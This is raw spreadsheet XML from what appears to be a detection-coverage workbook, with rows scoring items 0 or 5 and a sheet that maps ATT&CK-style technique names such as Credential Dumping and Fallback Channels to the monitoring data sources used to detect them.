        <v>0</v>
      </c>
      <c r="E23" s="6">
        <v>0</v>
      </c>
      <c r="F23" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A24" t="s">
        <v>322</v>
      </c>
      <c r="B24" t="s">
        <v>323</v>
      </c>
      <c r="C24" s="6">
        <v>5</v>
      </c>
      <c r="D24" s="6">
        <v>5</v>
      </c>
      <c r="E24" s="6">
        <v>5</v>
      </c>
      <c r="F24" s="4">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="25" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A25" t="s">
        <v>322</v>
      </c>
      <c r="B25" t="s">
        <v>324</v>
      </c>
      <c r="C25" s="6">
        <v>0</v>
      </c>
      <c r="D25" s="6">
        <v>0</v>
      </c>
      <c r="E25" s="6">
        <v>0</v>
      </c>
      <c r="F25" s="4">
        <f>((C25*2)+D25+(E25*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A26" t="s">
        <v>325</v>
      </c>
      <c r="B26" t="s">
        <v>311</v>
      </c>
      <c r="C26" s="6">
        <v>5</v>
      </c>
      <c r="D26" s="6">
        <v>5</v>
      </c>
      <c r="E26" s="6">
        <v>5</v>
      </c>
      <c r="F26" s="4">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="27" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A27" t="s">
        <v>326</v>
      </c>
      <c r="B27" t="s">
        <v>327</v>
      </c>
      <c r="C27" s="6">
        <v>0</v>
      </c>
      <c r="D27" s="6">
        <v>0</v>
      </c>
      <c r="E27" s="6">
        <v>0</v>
      </c>
      <c r="F27" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A28" t="s">
        <v>326</v>
      </c>
      <c r="B28" t="s">
        <v>328</v>
      </c>
      <c r="C28" s="6">
        <v>0</v>
      </c>
      <c r="D28" s="6">
        <v>0</v>
      </c>
      <c r="E28" s="6">
        <v>0</v>
      </c>
      <c r="F28" s="4">
        <f>((C28*2)+D28+(E28*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A29" t="s">
        <v>329</v>
      </c>
      <c r="C29" s="6">
        <v>0</v>
      </c>
      <c r="D29" s="6">
        <v>0</v>
      </c>
      <c r="E29" s="6">
        <v>0</v>
      </c>
      <c r="F29" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A30" t="s">
        <v>330</v>
      </c>
      <c r="C30" s="6">
        <v>0</v>
      </c>
      <c r="D30" s="6">
        <v>0</v>
      </c>
      <c r="E30" s="6">
        <v>0</v>
      </c>
      <c r="F30" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A31" t="s">
        <v>331</v>
      </c>
      <c r="B31" t="s">
        <v>332</v>
      </c>
      <c r="C31" s="6">
        <v>0</v>
      </c>
      <c r="D31" s="6">
        <v>0</v>
      </c>
      <c r="E31" s="6">
        <v>0</v>
      </c>
      <c r="F31" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A32" t="s">
        <v>333</v>
      </c>
      <c r="B32" t="s">
        <v>334</v>
      </c>
      <c r="C32" s="6">
        <v>0</v>
      </c>
      <c r="D32" s="6">
        <v>0</v>
      </c>
      <c r="E32" s="6">
        <v>0</v>
      </c>
      <c r="F32" s="4">
        <f>((C32*2)+D32+(E32*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A33" t="s">
        <v>333</v>
      </c>
      <c r="B33" t="s">
        <v>335</v>
      </c>
      <c r="C33" s="6">
        <v>0</v>
      </c>
      <c r="D33" s="6">
        <v>0</v>
      </c>
      <c r="E33" s="6">
        <v>0</v>
      </c>
      <c r="F33" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A34" t="s">
        <v>336</v>
      </c>
      <c r="B34" t="s">
        <v>337</v>
      </c>
      <c r="C34" s="6">
        <v>0</v>
      </c>
      <c r="D34" s="6">
        <v>0</v>
      </c>
      <c r="E34" s="6">
        <v>0</v>
      </c>
      <c r="F34" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A35" t="s">
        <v>338</v>
      </c>
      <c r="B35" t="s">
        <v>339</v>
      </c>
      <c r="C35" s="6">
        <v>0</v>
      </c>
      <c r="D35" s="6">
        <v>0</v>
      </c>
      <c r="E35" s="6">
        <v>0</v>
      </c>
      <c r="F35" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A36" t="s">
        <v>338</v>
      </c>
      <c r="B36" t="s">
        <v>340</v>
      </c>
      <c r="C36" s="6">
        <v>0</v>
      </c>
      <c r="D36" s="6">
        <v>0</v>
      </c>
      <c r="E36" s="6">
        <v>0</v>
      </c>
      <c r="F36" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A37" t="s">
        <v>341</v>
      </c>
      <c r="B37" t="s">
        <v>342</v>
      </c>
      <c r="C37" s="6">
        <v>0</v>
      </c>
      <c r="D37" s="6">
        <v>0</v>
      </c>
      <c r="E37" s="6">
        <v>0</v>
      </c>
      <c r="F37" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="38" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A38" t="s">
        <v>341</v>
      </c>
      <c r="B38" t="s">
        <v>343</v>
      </c>
      <c r="C38" s="6">
        <v>5</v>
      </c>
      <c r="D38" s="6">
        <v>5</v>
      </c>
      <c r="E38" s="6">
        <v>5</v>
      </c>
      <c r="F38" s="4">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="39" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A39" t="s">
        <v>341</v>
      </c>
      <c r="B39" t="s">
        <v>342</v>
      </c>
      <c r="C39" s="6">
        <v>0</v>
      </c>
      <c r="D39" s="6">
        <v>0</v>
      </c>
      <c r="E39" s="6">
        <v>0</v>
      </c>
      <c r="F39" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A40" t="s">
        <v>344</v>
      </c>
      <c r="B40" t="s">
        <v>342</v>
      </c>
      <c r="C40" s="6">
        <v>0</v>
      </c>
      <c r="D40" s="6">
        <v>0</v>
      </c>
      <c r="E40" s="6">
        <v>0</v>
      </c>
      <c r="F40" s="4">
        <f>((C40*2)+D40+(E40*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A41" t="s">
        <v>344</v>
      </c>
      <c r="B41" t="s">
        <v>345</v>
      </c>
      <c r="C41" s="6">
        <v>0</v>
      </c>
      <c r="D41" s="6">
        <v>0</v>
      </c>
      <c r="E41" s="6">
        <v>0</v>
      </c>
      <c r="F41" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="42" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A42" t="s">
        <v>344</v>
      </c>
      <c r="B42" t="s">
        <v>343</v>
      </c>
      <c r="C42" s="6">
        <v>5</v>
      </c>
      <c r="D42" s="6">
        <v>5</v>
      </c>
      <c r="E42" s="6">
        <v>5</v>
      </c>
      <c r="F42" s="4">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="43" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A43" t="s">
        <v>344</v>
      </c>
      <c r="B43" t="s">
        <v>346</v>
      </c>
      <c r="C43" s="6">
        <v>5</v>
      </c>
      <c r="D43" s="6">
        <v>5</v>
      </c>
      <c r="E43" s="6">
        <v>5</v>
      </c>
      <c r="F43" s="4">
        <f t="shared" ref="F43:F48" si="2">((C43*2)+D43+(E43*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="44" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A44" t="s">
        <v>344</v>
      </c>
      <c r="B44" t="s">
        <v>347</v>
      </c>
      <c r="C44" s="6">
        <v>5</v>
      </c>
      <c r="D44" s="6">
        <v>5</v>
      </c>
      <c r="E44" s="6">
        <v>5</v>
      </c>
      <c r="F44" s="4">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
    </row>
    <row r="45" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A45" t="s">
        <v>344</v>
      </c>
      <c r="B45" t="s">
        <v>348</v>
      </c>
      <c r="C45" s="6">
        <v>0</v>
      </c>
      <c r="D45" s="6">
        <v>0</v>
      </c>
      <c r="E45" s="6">
        <v>0</v>
      </c>
      <c r="F45" s="4">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="46" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A46" t="s">
        <v>344</v>
      </c>
      <c r="B46" t="s">
        <v>349</v>
      </c>
      <c r="C46" s="6">
        <v>0</v>
      </c>
      <c r="D46" s="6">
        <v>0</v>
      </c>
      <c r="E46" s="6">
        <v>0</v>
      </c>
      <c r="F46" s="4">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A47" t="s">
        <v>350</v>
      </c>
      <c r="B47" t="s">
        <v>351</v>
      </c>
      <c r="C47" s="6">
        <v>0</v>
      </c>
      <c r="D47" s="6">
        <v>0</v>
      </c>
      <c r="E47" s="6">
        <v>0</v>
      </c>
      <c r="F47" s="4">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="48" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A48" t="s">
        <v>350</v>
      </c>
      <c r="B48" t="s">
        <v>352</v>
      </c>
      <c r="C48" s="6">
        <v>5</v>
      </c>
      <c r="D48" s="6">
        <v>5</v>
      </c>
      <c r="E48" s="6">
        <v>5</v>
      </c>
      <c r="F48" s="4">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
    </row>
    <row r="49" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A49" t="s">
        <v>350</v>
      </c>
      <c r="B49" t="s">
        <v>353</v>
      </c>
      <c r="C49" s="6">
        <v>5</v>
      </c>
      <c r="D49" s="6">
        <v>5</v>
      </c>
      <c r="E49" s="6">
        <v>5</v>
      </c>
      <c r="F49" s="4">
        <f t="shared" ref="F49:F50" si="3">((C49*2)+D49+(E49*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="50" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A50" t="s">
        <v>350</v>
      </c>
      <c r="B50" t="s">
        <v>354</v>
      </c>
      <c r="C50" s="6">
        <v>5</v>
      </c>
      <c r="D50" s="6">
        <v>5</v>
      </c>
      <c r="E50" s="6">
        <v>5</v>
      </c>
      <c r="F50" s="4">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="51" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A51" t="s">
        <v>355</v>
      </c>
      <c r="B51" t="s">
        <v>356</v>
      </c>
      <c r="C51" s="6">
        <v>5</v>
      </c>
      <c r="D51" s="6">
        <v>5</v>
      </c>
      <c r="E51" s="6">
        <v>5</v>
      </c>
      <c r="F51" s="4">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
    </row>
    <row r="52" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A52" t="s">
        <v>355</v>
      </c>
      <c r="B52" t="s">
        <v>357</v>
      </c>
      <c r="C52" s="6">
        <v>5</v>
      </c>
      <c r="D52" s="6">
        <v>5</v>
      </c>
      <c r="E52" s="6">
        <v>5</v>
      </c>
      <c r="F52" s="4">
        <f>((C52*2)+D52+(E52*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="53" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A53" t="s">
        <v>355</v>
      </c>
      <c r="B53" t="s">
        <v>358</v>
      </c>
      <c r="C53" s="6">
        <v>0</v>
      </c>
      <c r="D53" s="6">
        <v>0</v>
      </c>
      <c r="E53" s="6">
        <v>0</v>
      </c>
      <c r="F53" s="4">
        <f>((C53*2)+D53+(E53*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="54" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A54" t="s">
        <v>355</v>
      </c>
      <c r="B54" t="s">
        <v>359</v>
      </c>
      <c r="C54" s="6">
        <v>0</v>
      </c>
      <c r="D54" s="6">
        <v>0</v>
      </c>
      <c r="E54" s="6">
        <v>0</v>
      </c>
      <c r="F54" s="4">
        <f>((C54*2)+D54+(E54*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="55" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A55" t="s">
        <v>360</v>
      </c>
      <c r="B55" t="s">
        <v>361</v>
      </c>
      <c r="C55" s="6">
        <v>0</v>
      </c>
      <c r="D55" s="6">
        <v>0</v>
      </c>
      <c r="E55" s="6">
        <v>0</v>
      </c>
      <c r="F55" s="4">
        <f>((C55*2)+D55+(E55*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A56" t="s">
        <v>360</v>
      </c>
      <c r="B56" t="s">
        <v>362</v>
      </c>
      <c r="C56" s="6">
        <v>0</v>
      </c>
      <c r="D56" s="6">
        <v>0</v>
      </c>
      <c r="E56" s="6">
        <v>0</v>
      </c>
      <c r="F56" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A57" t="s">
        <v>360</v>
      </c>
      <c r="B57" t="s">
        <v>363</v>
      </c>
      <c r="C57" s="6">
        <v>0</v>
      </c>
      <c r="D57" s="6">
        <v>0</v>
      </c>
      <c r="E57" s="6">
        <v>0</v>
      </c>
      <c r="F57" s="4">
        <f>((C57*2)+D57+(E57*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="58" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A58" t="s">
        <v>364</v>
      </c>
      <c r="C58" s="6">
        <v>0</v>
      </c>
      <c r="D58" s="6">
        <v>0</v>
      </c>
      <c r="E58" s="6">
        <v>0</v>
      </c>
      <c r="F58" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A59" t="s">
        <v>365</v>
      </c>
      <c r="C59" s="6">
        <v>0</v>
      </c>
      <c r="D59" s="6">
        <v>0</v>
      </c>
      <c r="E59" s="6">
        <v>0</v>
      </c>
      <c r="F59" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="60" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A60" t="s">
        <v>366</v>
      </c>
      <c r="C60" s="6">
        <v>0</v>
      </c>
      <c r="D60" s="6">
        <v>0</v>
      </c>
      <c r="E60" s="6">
        <v>0</v>
      </c>
      <c r="F60" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A61" t="s">
        <v>367</v>
      </c>
      <c r="C61" s="6">
        <v>0</v>
      </c>
      <c r="D61" s="6">
        <v>0</v>
      </c>
      <c r="E61" s="6">
        <v>0</v>
      </c>
      <c r="F61" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="62" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A62" t="s">
        <v>368</v>
      </c>
      <c r="C62" s="6">
        <v>0</v>
      </c>
      <c r="D62" s="6">
        <v>0</v>
      </c>
      <c r="E62" s="6">
        <v>0</v>
      </c>
      <c r="F62" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="63" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A63" t="s">
        <v>369</v>
      </c>
      <c r="B63" t="s">
        <v>370</v>
      </c>
      <c r="C63" s="6">
        <v>0</v>
      </c>
      <c r="D63" s="6">
        <v>0</v>
      </c>
      <c r="E63" s="6">
        <v>0</v>
      </c>
      <c r="F63" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A64" t="s">
        <v>371</v>
      </c>
      <c r="B64" t="s">
        <v>372</v>
      </c>
      <c r="C64" s="6">
        <v>0</v>
      </c>
      <c r="D64" s="6">
        <v>0</v>
      </c>
      <c r="E64" s="6">
        <v>0</v>
      </c>
      <c r="F64" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="65" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A65" t="s">
        <v>371</v>
      </c>
      <c r="B65" t="s">
        <v>373</v>
      </c>
      <c r="C65" s="6">
        <v>0</v>
      </c>
      <c r="D65" s="6">
        <v>0</v>
      </c>
      <c r="E65" s="6">
        <v>0</v>
      </c>
      <c r="F65" s="4">
        <f>((C65*2)+D65+(E65*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="66" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A66" t="s">
        <v>374</v>
      </c>
      <c r="B66" t="s">
        <v>308</v>
      </c>
      <c r="C66" s="6">
        <v>0</v>
      </c>
      <c r="D66" s="6">
        <v>0</v>
      </c>
      <c r="E66" s="6">
        <v>0</v>
      </c>
      <c r="F66" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A67" t="s">
        <v>374</v>
      </c>
      <c r="B67" t="s">
        <v>375</v>
      </c>
      <c r="C67" s="6">
        <v>5</v>
      </c>
      <c r="D67" s="6">
        <v>5</v>
      </c>
      <c r="E67" s="6">
        <v>5</v>
      </c>
      <c r="F67" s="4">
        <f t="shared" ref="F67:F69" si="4">((C67*2)+D67+(E67*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="68" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A68" t="s">
        <v>374</v>
      </c>
      <c r="B68" t="s">
        <v>376</v>
      </c>
      <c r="C68" s="6">
        <v>5</v>
      </c>
      <c r="D68" s="6">
        <v>5</v>
      </c>
      <c r="E68" s="6">
        <v>5</v>
      </c>
      <c r="F68" s="4">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="69" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A69" t="s">
        <v>374</v>
      </c>
      <c r="B69" t="s">
        <v>377</v>
      </c>
      <c r="C69" s="6">
        <v>5</v>
      </c>
      <c r="D69" s="6">
        <v>5</v>
      </c>
      <c r="E69" s="6">
        <v>5</v>
      </c>
      <c r="F69" s="4">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
    </row>
    <row r="70" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A70" t="s">
        <v>378</v>
      </c>
      <c r="B70" t="s">
        <v>379</v>
      </c>
      <c r="C70" s="6">
        <v>0</v>
      </c>
      <c r="D70" s="6">
        <v>0</v>
      </c>
      <c r="E70" s="6">
        <v>0</v>
      </c>
      <c r="F70" s="4">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="71" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A71" t="s">
        <v>378</v>
      </c>
      <c r="B71" t="s">
        <v>380</v>
      </c>
      <c r="C71" s="6">
        <v>5</v>
      </c>
      <c r="D71" s="6">
        <v>5</v>
      </c>
      <c r="E71" s="6">
        <v>5</v>
      </c>
      <c r="F71" s="4">
        <f t="shared" ref="F71:F73" si="5">((C71*2)+D71+(E71*2))/5</f>
        <v>5</v>
      </c>
    </row>
    <row r="72" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A72" t="s">
        <v>378</v>
      </c>
      <c r="B72" t="s">
        <v>381</v>
      </c>
      <c r="C72" s="6">
        <v>5</v>
      </c>
      <c r="D72" s="6">
        <v>5</v>
      </c>
      <c r="E72" s="6">
        <v>5</v>
      </c>
      <c r="F72" s="4">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
    </row>
    <row r="73" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A73" t="s">
        <v>378</v>
      </c>
      <c r="B73" t="s">
        <v>382</v>
      </c>
      <c r="C73" s="6">
        <v>5</v>
      </c>
      <c r="D73" s="6">
        <v>5</v>
      </c>
      <c r="E73" s="6">
        <v>5</v>
      </c>
      <c r="F73" s="4">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
    </row>
    <row r="74" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A74" t="s">
        <v>1603</v>
      </c>
      <c r="B74" t="s">
        <v>1604</v>
      </c>
      <c r="C74" s="6">
        <v>5</v>
      </c>
      <c r="D74" s="6">
        <v>5</v>
      </c>
      <c r="E74" s="6">
        <v>5</v>
      </c>
      <c r="F74" s="4">
        <v>5</v>
      </c>
    </row>
  </sheetData>
  <conditionalFormatting sqref="C1:E1048576">
    <cfRule type="colorScale" priority="3">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="percent" val="50"/>
        <cfvo type="max"/>
        <color rgb="FFF8696B"/>
        <color rgb="FFFFEB84"/>
        <color rgb="FF63BE7B"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1:F1048576">
    <cfRule type="colorScale" priority="2">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="percent" val="50"/>
        <cfvo type="max"/>
        <color rgb="FFF8696B"/>
        <color rgb="FFFFEB84"/>
        <color rgb="FF63BE7B"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I8">
    <cfRule type="colorScale" priority="1">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="percent" val="50"/>
        <cfvo type="max"/>
        <color rgb="FFF8696B"/>
        <color rgb="FFFFEB84"/>
        <color rgb="FF63BE7B"/>
      </colorScale>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267"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScaleNormal="100" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A194" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="A225" sqref="A225:E267"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="20.83203125" customWidth="1"/>
    <col min="2" max="2" width="124.83203125" customWidth="1"/>
    <col min="3" max="3" width="21" style="8" customWidth="1"/>
    <col min="4" max="4" width="11.6640625" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="8.33203125" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="17.6640625" customWidth="1"/>
    <col min="8" max="8" width="49.6640625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A1" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>56</v>
      </c>
      <c r="C1" s="9" t="s">
        <v>57</v>
      </c>
      <c r="D1" s="9" t="s">
        <v>58</v>
      </c>
      <c r="E1" s="9" t="s">
        <v>59</v>
      </c>
      <c r="F1" s="9"/>
      <c r="G1" s="1" t="s">
        <v>1140</v>
      </c>
      <c r="H1" s="9" t="s">
        <v>383</v>
      </c>
    </row>
    <row r="2" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A2" s="11" t="s">
        <v>60</v>
      </c>
      <c r="B2" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C2" s="8" t="s">
        <v>1105</v>
      </c>
      <c r="D2">
        <f>LEN(TRIM(B2))-LEN(SUBSTITUTE(TRIM(B2),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E2">
        <f t="shared" ref="E2:E8" si="0">LEN(TRIM(C2))-LEN(SUBSTITUTE(TRIM(C2),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F2" s="10"/>
      <c r="G2">
        <f>SUM(COUNTA('REF-DataSources'!A:A)-COUNTA(A:A))</f>
        <v>0</v>
      </c>
      <c r="H2" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:B)</f>
        <v>Data Obfuscation</v>
      </c>
    </row>
    <row r="3" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3" s="11" t="s">
        <v>61</v>
      </c>
      <c r="B3" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C3" s="8" t="s">
        <v>1106</v>
      </c>
      <c r="D3">
        <f t="shared" ref="D3:D66" si="1">LEN(TRIM(B3))-LEN(SUBSTITUTE(TRIM(B3),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E3">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F3" s="10"/>
      <c r="H3" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:B)</f>
        <v>Data Compressed</v>
      </c>
    </row>
    <row r="4" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A4" s="11" t="s">
        <v>62</v>
      </c>
      <c r="B4" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,PowerShell logs,Process command-line parameters</v>
      </c>
      <c r="C4" s="8" t="s">
        <v>1106</v>
      </c>
      <c r="D4">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E4">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F4" s="10"/>
      <c r="H4" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:B)</f>
        <v>Credential Dumping</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A5" s="11" t="s">
        <v>63</v>
      </c>
      <c r="B5" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring</v>
      </c>
      <c r="C5" s="8" t="s">
        <v>1107</v>
      </c>
      <c r="D5">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E5">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="F5" s="10"/>
      <c r="H5" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:B)</f>
        <v>Winlogon Helper DLL</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A6" s="11" t="s">
        <v>64</v>
      </c>
      <c r="B6" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C6" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D6">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E6">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="F6" s="10"/>
      <c r="H6" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:B)</f>
        <v>Data from Local System</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A7" s="11" t="s">
        <v>65</v>
      </c>
      <c r="B7" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C7" s="8">
        <v>100</v>
      </c>
      <c r="D7">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E7">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="H7" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:B)</f>
        <v>File System Logical Offsets</v>
      </c>
    </row>
    <row r="8" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A8" s="11" t="s">
        <v>66</v>
      </c>
      <c r="B8" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C8" s="8" t="s">
        <v>1109</v>
      </c>
      <c r="D8">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E8">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="H8" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:B)</f>
        <v>System Service Discovery</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A9" s="11" t="s">
        <v>68</v>
      </c>
      <c r="B9" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:C)</f>
        <v>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</v>
      </c>
      <c r="C9" s="8" t="s">
        <v>1110</v>
      </c>
      <c r="D9">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E9">
        <f>LEN(TRIM(C9))-LEN(SUBSTITUTE(TRIM(C9),";",""))+1</f>
        <v>5</v>
      </c>
      <c r="H9" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:B)</f>
        <v>Fallback Channels</v>
